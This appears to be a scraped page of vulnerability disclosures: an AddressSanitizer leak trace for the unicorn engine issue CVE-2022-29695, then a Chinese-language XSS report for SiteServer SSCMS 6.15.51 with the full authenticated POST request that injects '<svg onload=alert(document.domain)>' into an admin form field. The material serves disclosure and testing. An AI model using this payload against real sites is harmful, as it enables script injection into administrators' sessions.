    #2 0x7f03714b69dc in tcg\_exec\_init\_x86\_64 /home/lys/Documents/my/unicorn/qemu/accel/tcg/translate-all.c:1085
    #3 0x7f03714584ba in machine\_initialize /home/lys/Documents/my/unicorn/qemu/softmmu/vl.c:53
    #4 0x7f0371453f55 in uc\_init /home/lys/Documents/my/unicorn/uc.c:214
    #5 0x7f03714556a9 in uc\_mem\_map /home/lys/Documents/my/unicorn/uc.c:1010
    #6 0x5606ff4f335e in main /home/lys/Documents/unitest/poc\_test.c:30
    #7 0x7f0370f1a7ec in \_\_libc\_start\_main ../csu/libc-start.c:332

Direct leak of 160 byte(s) in 1 object(s) allocated from:
    #0 0x7f0372853e8f in \_\_interceptor\_malloc ../../../../src/libsanitizer/asan/asan\_malloc\_linux.cpp:145                  
    #1 0x7f037145bf4e in g\_malloc /home/lys/Documents/my/unicorn/glib\_compat/gmem.c:93
    #2 0x7f03714644d8 in memory\_map\_init /home/lys/Documents/my/unicorn/qemu/exec.c:1463
    #3 0x7f0371464dae in cpu\_exec\_init\_all\_x86\_64 /home/lys/Documents/my/unicorn/qemu/exec.c:1754
    #4 0x7f037145848d in machine\_initialize /home/lys/Documents/my/unicorn/qemu/softmmu/vl.c:48
    #5 0x7f0371453f55 in uc\_init /home/lys/Documents/my/unicorn/uc.c:214
    #6 0x7f03714556a9 in uc\_mem\_map /home/lys/Documents/my/unicorn/uc.c:1010
    #7 0x5606ff4f335e in main /home/lys/Documents/unitest/poc\_test.c:30
    #8 0x7f0370f1a7ec in \_\_libc\_start\_main ../csu/libc-start.c:332

#...
SUMMARY: AddressSanitizer: 710422 byte(s) leaked in 27 allocation(s).

CVE-2022-29695: Memory leaks caused by incomplete unicorn engine initialization. · Issue #1595 · unicorn-engine/unicorn

siteserver SSCMS 6.15.51 is vulnerable to Cross Site Scripting (XSS).

测试的版本:https://github.com/siteserver/cms/releases/download/siteserver-v6.15.51/siteserver\_install.zip  
SiteServer: V6.15.51  
测试环境：windows 2012 R2  
数据库 sql server 2016  
  
(需要登录测试)  
漏洞url:/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  

包体  
\`POST /SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1 HTTP/1.1  
Host: 192.168.39.3:8055  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8  
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 304  
Origin: http://192.168.39.3:8055  
Connection: close  
Referer: http://192.168.39.3:8055/SiteServer/cms/modalRelatedFieldItemEdit.aspx?siteId=1&RelatedFieldID=1&ParentID=0&Level=1&ID=1  
Cookie: BAIRONG.VC.ADMINLOGIN=oeLExOp9UBM0equals0; ss\_administrator\_access\_token=M3ENIa3NKJJ39JCRHnY4PgfJqMC7lFjggL0e9S06Bs9ubZE90add0xM2aesaL0add0Cxo8Xe5VZrSanerzFU8oZaMXCC9KMxdw29fLk6uNSSoY4Pa0add0BOZfzRwKT2t3LglumO4sTUKSz0slash0ubJ9QajCyTsKpmbPu7yv20add08zpsQyVPpl3TuMITkOCIX1EwcC7CeIJ50slash0XQ9d0slash0oR8ECV0add0690add0eXRHbEImnZsLBsrhv7KML0Jhuevbhvcjs0equals0; ASP.NET\_SessionId=l3tothqgmzbgljaogh1uof3y; SS-ADMIN-TOKEN=z69iWbk6QAgWtUmPiJBXDd7vXmikE7IMRbVWfh0add00xyMUHXn13zDSbfJyodBLcAQuP9kU0slash0F7SybZwZUK7ER9csWj0ODr7NgSqXfVWABfJpKMXGuT2wQudsXkhDU9JMvsrkNIPV5cKDS3vGUQNyPwFtxt7YFaPv4h0slash09w0slash0UOjfXLezfaa1ML5HzkaV5p1JCQWmJTQEnr7CYs7SWD7Jqq2Ifc0slash0oUvADaZFl2TmYxcUUCqEQ0equals00secret0  
Upgrade-Insecure-Requests: 1

\_\_EVENTTARGET=&\_\_EVENTARGUMENT=&\_\_VIEWSTATE=MVZqB4shzUeYHIX5zAuRZJJbL8r72A7Evx94mUbTTNpGbOwWBZkeb79FVsI2zTj0PlNYIzK%2BpEzx3SRf96HflbXA8nFVIpCU16GBIeWZSq4vLCZLjX0CoHWGwnxNyQzo&\_\_VIEWSTATEGENERATOR=4DCED64B&TbItemName=%3Csvg+onload%3Dalert%28document.domain%29%3E&TbItemValue=2222&ctl04=%E7%A1%AE+%E5%AE%9A\`

Tag

#mac